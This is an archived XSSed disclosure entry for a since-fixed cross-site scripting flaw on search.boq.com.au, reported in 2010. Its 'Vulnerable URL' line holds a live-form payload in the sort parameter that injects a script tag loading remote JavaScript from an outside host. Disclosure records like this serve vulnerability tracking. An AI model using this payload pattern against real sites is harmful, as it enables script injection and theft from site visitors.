Fixed XSS vulnerability at search.boq.com.au

2010-01-19T00:00:00
ID XSSED:65736
Type xssed
Reporter Wireghoul
Modified 2011-07-11T00:00:00

Description

Security researcher Wireghoul, has submitted on 19/01/2010 a cross-site-scripting (XSS) vulnerability affecting search.boq.com.au, which at the time of submission ranked 23736 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/11/2011. It is currently fixed.

Vulnerable URL: http://search.boq.com.au/search/search.cgi?query_and=&query_phrase=&query_or=&query_not=&sort=title%22%3Ejuju%3Cscript%20src=%27http://justanotherhacker.com/x.js%27%3E&scope=&meta_t=&meta_a=&meta_s=&meta_f_sand=&meta_d1day=&meta_d1month=&meta_d1year=&meta_d2day=&meta_d2month=&meta_d2year=&collection=boq&form=advanced